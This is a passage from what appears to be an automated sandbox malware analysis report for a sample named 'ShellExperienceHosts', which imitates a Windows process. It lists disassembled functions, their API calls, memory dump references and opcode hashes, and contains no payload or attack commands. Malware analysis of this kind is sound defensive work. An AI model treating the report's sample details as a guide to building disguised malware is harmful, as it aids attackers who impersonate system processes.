                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ClassLongMessageSend$H_prolog3
                                                                            • String ID:
                                                                            • API String ID: 350087385-0
                                                                            • Opcode ID: 49f138f203dde7901fad8a92edce201d016a5eb6f646ee009203d348d2ae4846
                                                                            • Instruction ID: fa86b9c5845d3ac592f6cb9c888eb556f6f47142675469b9de74155cabfe0226
                                                                            • Opcode Fuzzy Hash: 49f138f203dde7901fad8a92edce201d016a5eb6f646ee009203d348d2ae4846
                                                                            • Instruction Fuzzy Hash: 5811E432A1522ABBDB225AA0CE45FAE7635BF1576CF100331F45076AE0DB60DC008694
                                                                            Function 6C71EB66 Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C71EB6D
                                                                            • GetWindowRect.USER32(00000000,00000000), ref: 6C71EBB6
                                                                            • CreateRoundRectRgn.GDI32(00000000,00000000,00000001,?,00000004,00000004), ref: 6C71EBE0
                                                                            • SetWindowRgn.USER32(00000000,?,00000000), ref: 6C71EBF6
                                                                            • SetWindowRgn.USER32(00000000,00000000,00000000), ref: 6C71EC0E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rect$CreateH_prolog3_Round
                                                                            • String ID:
                                                                            • API String ID: 2502471913-0
                                                                            • Opcode ID: 08b0775f44596085cdad784c82885e6453b9e0ec2f132c013dd1d41af9664106
                                                                            • Instruction ID: 5f76dbfd149fdb802652514307520c3ddfd93c3ee06ac5a28bdffa2d8cd5daae
                                                                            • Opcode Fuzzy Hash: 08b0775f44596085cdad784c82885e6453b9e0ec2f132c013dd1d41af9664106
                                                                            • Instruction Fuzzy Hash: 8B113D75A00519EFDF15CFA4CE88AEDBB78FF09208F140229E501B3A50DB31AD55CBA5
                                                                            Function 6C70844A Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C708451
                                                                            • IsWindow.USER32(?), ref: 6C708478
                                                                            • InflateRect.USER32(?,00000000,000000FF), ref: 6C708494
                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 6C7084A9
                                                                            • UpdateWindow.USER32(?), ref: 6C7084B8
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: RectWindow$H_prolog3_InflateInvalidateUpdate
                                                                            • String ID:
                                                                            • API String ID: 2146894351-0
                                                                            • Opcode ID: 36b2405668493ea3a48cd7bd62d5d083e67f567e9821a83ee3b6354b8a262d52
                                                                            • Instruction ID: ebb2b80c891d376d7395123ed57953d251efc50b4756b44fa8578043ab8c2ec3
                                                                            • Opcode Fuzzy Hash: 36b2405668493ea3a48cd7bd62d5d083e67f567e9821a83ee3b6354b8a262d52
                                                                            • Instruction Fuzzy Hash: 1F11F9717002159FDF15DFA4CA98F9937B5BF49308F1401A8E919AF2A1DB31E909CB60
                                                                            Function 10002BD0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 10002BFF
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 10002C15
                                                                            • TranslateMessage.USER32(?), ref: 10002C24
                                                                            • DispatchMessageW.USER32(?), ref: 10002C2A
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 10002C38
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                            • String ID:
                                                                            • API String ID: 2015114452-0
                                                                            • Opcode ID: dbe9700d19ae9a12251f89c422866142aee7b4545ced7af6ef9db51ab6727882
                                                                            • Instruction ID: 0e3c485fe407bbf507bfa30b8d40781191f7ce2fd7dbe990fe93c7e11cc8c17a
                                                                            • Opcode Fuzzy Hash: dbe9700d19ae9a12251f89c422866142aee7b4545ced7af6ef9db51ab6727882
                                                                            • Instruction Fuzzy Hash: 8901A972A80319F6F610EB948D91FAE736CEB04B91F504511FF04EE0D9DAB1E80587B4
                                                                            Function 0224367A Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __CreateFrameInfo.LIBCMT ref: 022436A2
                                                                              • Part of subcall function 02243232: __getptd.LIBCMT ref: 02243240
                                                                              • Part of subcall function 02243232: __getptd.LIBCMT ref: 0224324E
                                                                            • __getptd.LIBCMT ref: 022436AC
                                                                              • Part of subcall function 022398E6: __getptd_noexit.LIBCMT ref: 022398E9
                                                                              • Part of subcall function 022398E6: __amsg_exit.LIBCMT ref: 022398F6
                                                                            • __getptd.LIBCMT ref: 022436BA
                                                                            • __getptd.LIBCMT ref: 022436C8
                                                                            • __getptd.LIBCMT ref: 022436D3
                                                                              • Part of subcall function 022432D7: __CallSettingFrame@12.LIBCMT ref: 02243323
                                                                              • Part of subcall function 022437A0: __getptd.LIBCMT ref: 022437AF
                                                                              • Part of subcall function 022437A0: __getptd.LIBCMT ref: 022437BD
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 3282538202-0
                                                                            • Opcode ID: 2f8cf262afac08e33e01d992e0837c391acebccb040fbf70ddcfda8d5a1f53bb
                                                                            • Instruction ID: ea274e39d583fa523b6501a8518a0dc9f6ba60b314e7c4157d6f4fcbd0b06614
                                                                            • Opcode Fuzzy Hash: 2f8cf262afac08e33e01d992e0837c391acebccb040fbf70ddcfda8d5a1f53bb
                                                                            • Instruction Fuzzy Hash: 9B11E2B1C103099FDB01EFE4C945AAE7BB1FF48310F1084AAE814AB254EB789A549F50
                                                                            Function 10004B50 Relevance: 7.5, APIs: 6, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 10004B63
                                                                            • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 10004B6D
                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 10004B80
                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 10004B83
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave
                                                                            • String ID:
                                                                            • API String ID: 3168844106-0
                                                                            • Opcode ID: 3c4cb16bca3ae15824b6f58c01f312d0d5f5bcc1af3ff3d380ee54a514ce913b
                                                                            • Instruction ID: aa03fd3e3b24d4ff679a20f9d9d19219b814eae2566e95c25fa4737bddb7a95c
                                                                            • Opcode Fuzzy Hash: 3c4cb16bca3ae15824b6f58c01f312d0d5f5bcc1af3ff3d380ee54a514ce913b
                                                                            • Instruction Fuzzy Hash: 4A0184765006109FE310DB75ECC8B9BB3E8EB8C355F064819E10687100C735FC458AA4
                                                                            Function 6C706B7A Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 6C706B8F
                                                                            • ScreenToClient.USER32(?,?), ref: 6C706B9C
                                                                            • PtInRect.USER32(?,?,?), ref: 6C706BAF
                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 6C706BD1
                                                                            • SetCursor.USER32(?), ref: 6C706BEF
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$ClientLoadRectScreen
                                                                            • String ID:
                                                                            • API String ID: 2747913190-0
                                                                            • Opcode ID: 4518deff5e490e8ceedbfbd23a81c278b332c705b457c5cc2b34f9dd9df91d3f
                                                                            • Instruction ID: 3e7cd8220cd77dbc0962e245a166d5b21a83738c2ea23ff14e38f0ff56f98981
                                                                            • Opcode Fuzzy Hash: 4518deff5e490e8ceedbfbd23a81c278b332c705b457c5cc2b34f9dd9df91d3f
                                                                            • Instruction Fuzzy Hash: A10127B1A0410AEBDF215FA1C908DEE7FB8EF49219B0040BAE516D3520DB30AA40DBA5
                                                                            Function 6C7BEED1 Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ScreenToClient.USER32(?,?), ref: 6C7BEEDE
                                                                            • SendMessageW.USER32(?,00000366,00000000,00000000), ref: 6C7BEEFA
                                                                            • ClientToScreen.USER32(?,?), ref: 6C7BEF07
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 6C7BEF10
                                                                            • GetParent.USER32(?), ref: 6C7BEF1E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ClientScreen$LongMessageParentSendWindow
                                                                            • String ID:
                                                                            • API String ID: 4240056119-0
                                                                            • Opcode ID: 77249b0a0c366d36936aa13d21d5f20ce2171b97eb4919df2b1af892acb26c56
                                                                            • Instruction ID: 5c7f471a0883619593767f6ba7e6d80f7bc036b36251c9176ccc22a02c7aa37f
                                                                            • Opcode Fuzzy Hash: 77249b0a0c366d36936aa13d21d5f20ce2171b97eb4919df2b1af892acb26c56
                                                                            • Instruction Fuzzy Hash: 34F06D366015297BDB120F188804AAE37BDAF46665F104239FD26D7280EB74EA01C3E4
                                                                            Function 022397B9 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(10015EB4,10017C00,00000008,022398C1,00000000,00000000,?,0000FFFF,022370E9,0223BB26), ref: 022397CA
                                                                            • __lock.LIBCMT ref: 022397FE
                                                                              • Part of subcall function 0223C11B: __amsg_exit.LIBCMT ref: 0223C13D
                                                                              • Part of subcall function 0223C11B: RtlEnterCriticalSection.NTDLL(00000001), ref: 0223C145
                                                                            • InterlockedIncrement.KERNEL32(?), ref: 0223980B
                                                                            • __lock.LIBCMT ref: 0223981F
                                                                            • ___addlocaleref.LIBCMT ref: 0223983D
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit
                                                                            • String ID:
                                                                            • API String ID: 3732598078-0
                                                                            • Opcode ID: 1ae46c3c0705c16859de1524d443c2f78480582e4eecfadb3e0c6c510edcdf56
                                                                            • Instruction ID: 6cdb7dd8fb65a2e5784941634cd77c95f866f721999cee128beb97f6ce2629a1
                                                                            • Opcode Fuzzy Hash: 1ae46c3c0705c16859de1524d443c2f78480582e4eecfadb3e0c6c510edcdf56
                                                                            • Instruction Fuzzy Hash: 8C01ADB1810B00DEE722EFA9C844349BBE2EF51321F50890EE5D65B3A0CBB4E681CF11
                                                                            Function 02232CE7 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 02232D13
                                                                            • CancelIo.KERNEL32(?), ref: 02232D1D
                                                                            • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02232D26
                                                                            • closesocket.WS2_32(?), ref: 02232D30
                                                                            • SetEvent.KERNEL32(00000001), ref: 02232D3A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                            • String ID:
                                                                            • API String ID: 1486965892-0
                                                                            • Opcode ID: 2ceef8d7a9cb16c2b8d4c923c9bd50e46f51888a66d7a8a6949057e86b5d425b
                                                                            • Instruction ID: 01c2b408316fc8fbc0d987091410d6f9fac0f889cc6c905a04ae372b693ad485
                                                                            • Opcode Fuzzy Hash: 2ceef8d7a9cb16c2b8d4c923c9bd50e46f51888a66d7a8a6949057e86b5d425b
                                                                            • Instruction Fuzzy Hash: 8CF04F76100714EFE321DB94CC89F5677B8FB49B12F148659FA829B690CBB1F904CBA0
                                                                            Function 0223E116 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __getptd.LIBCMT ref: 0223E122
                                                                              • Part of subcall function 022398E6: __getptd_noexit.LIBCMT ref: 022398E9
                                                                              • Part of subcall function 022398E6: __amsg_exit.LIBCMT ref: 022398F6
                                                                            • __getptd.LIBCMT ref: 0223E139
                                                                            • __amsg_exit.LIBCMT ref: 0223E147
                                                                            • __lock.LIBCMT ref: 0223E157
                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0223E16B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                            • String ID:
                                                                            • API String ID: 938513278-0
                                                                            • Opcode ID: ae27d4fbf31c29595a38e1aa150fd8cf220abffb4ca541ac361fbea8b80d16f3
                                                                            • Instruction ID: 1e462fdd77c49dcb07edea8c17b774fe0c9f0c3d2daeb4a2cc6fa7a1ae9e4951
                                                                            • Opcode Fuzzy Hash: ae27d4fbf31c29595a38e1aa150fd8cf220abffb4ca541ac361fbea8b80d16f3
                                                                            • Instruction Fuzzy Hash: 5FF0B4B2E347109BDB2BFBF4980175D33B1AF00B24F164109E5946B2E8CBB49884DE56
                                                                            Function 031B49C5 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __getptd.LIBCMT ref: 031B49D1
                                                                              • Part of subcall function 031B381A: __getptd_noexit.LIBCMT ref: 031B381D
                                                                              • Part of subcall function 031B381A: __amsg_exit.LIBCMT ref: 031B382A
                                                                            • __getptd.LIBCMT ref: 031B49E8
                                                                            • __amsg_exit.LIBCMT ref: 031B49F6
                                                                            • __lock.LIBCMT ref: 031B4A06
                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 031B4A1A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                            • String ID:
                                                                            • API String ID: 938513278-0
                                                                            • Opcode ID: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
                                                                            • Instruction ID: d30e95ced4cc921c56641fb36d9500caf1f748f0d3c9451d0db74745671793fb
                                                                            • Opcode Fuzzy Hash: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
                                                                            • Instruction Fuzzy Hash: A6F0B43A944720DBE725FBBA98027CE77B0BF0C720F55C249D425AF2D2DF245941CA5A
                                                                            Function 1000E13F Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __getptd.LIBCMT ref: 1000E14B
                                                                              • Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
                                                                              • Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F
                                                                            • __getptd.LIBCMT ref: 1000E162
                                                                            • __amsg_exit.LIBCMT ref: 1000E170
                                                                            • __lock.LIBCMT ref: 1000E180
                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 1000E194
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                            • String ID:
                                                                            • API String ID: 938513278-0
                                                                            • Opcode ID: 0522d91088f6fb7310532faddd65fc2dc9ce4b376bceba7dbe74de096dd3a9dc
                                                                            • Instruction ID: 612b0c8b07e52b5ee846fa9c2d173a4fa9df34f322aac77c2402261cad3e7578
                                                                            • Opcode Fuzzy Hash: 0522d91088f6fb7310532faddd65fc2dc9ce4b376bceba7dbe74de096dd3a9dc
                                                                            • Instruction Fuzzy Hash: 59F090369446249BF721EBB8980278D32F0EF40BE0F118149F494771DACB74AD40CA56
                                                                            Function 100071AA Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 100082F0: _doexit.LIBCMT ref: 100082FC
                                                                            • ___set_flsgetvalue.LIBCMT ref: 100071BC
                                                                              • Part of subcall function 10009754: TlsGetValue.KERNEL32(00000000,100098AD,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000), ref: 1000975D
                                                                              • Part of subcall function 10009754: DecodePointer.KERNEL32(?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA,0000000D), ref: 1000976F
                                                                              • Part of subcall function 10009754: TlsSetValue.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 1000977E
                                                                            • ___fls_getvalue@4.LIBCMT ref: 100071C7
                                                                              • Part of subcall function 10009734: TlsGetValue.KERNEL32(?,?,100071CC,00000000), ref: 10009742
                                                                            • ___fls_setvalue@8.LIBCMT ref: 100071DA
                                                                              • Part of subcall function 10009788: DecodePointer.KERNEL32(?,?,?,100071DF,00000000,?,00000000), ref: 10009799
                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 100071E3
                                                                            • ExitThread.KERNEL32 ref: 100071EA
                                                                            • GetCurrentThreadId.KERNEL32 ref: 100071F0
                                                                            • __freefls@4.LIBCMT ref: 10007210
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                            • String ID:
                                                                            • API String ID: 781180411-0
                                                                            • Opcode ID: 0a01c43476d108d4c9d86bcd5ae0e752dcea8e710ecd95c49a8faa49c4d187ed
                                                                            • Instruction ID: 877ff296740ff87ffef8dcd6d6c63871bb1eb85cd0bb9270c275db20a0a7633c
                                                                            • Opcode Fuzzy Hash: 0a01c43476d108d4c9d86bcd5ae0e752dcea8e710ecd95c49a8faa49c4d187ed
                                                                            • Instruction Fuzzy Hash: 22E04F3A81865967FB01ABF18D4E8CF366CEF052D5B158420FA189701BDB38E90146A1
                                                                            Function 6C718C41 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 74COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C718C48
                                                                              • Part of subcall function 6C7C2EEA: __EH_prolog3.LIBCMT ref: 6C7C2EF1
                                                                              • Part of subcall function 6C770A0E: GetDlgCtrlID.USER32(?), ref: 6C770A19
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: H_prolog3$Ctrl
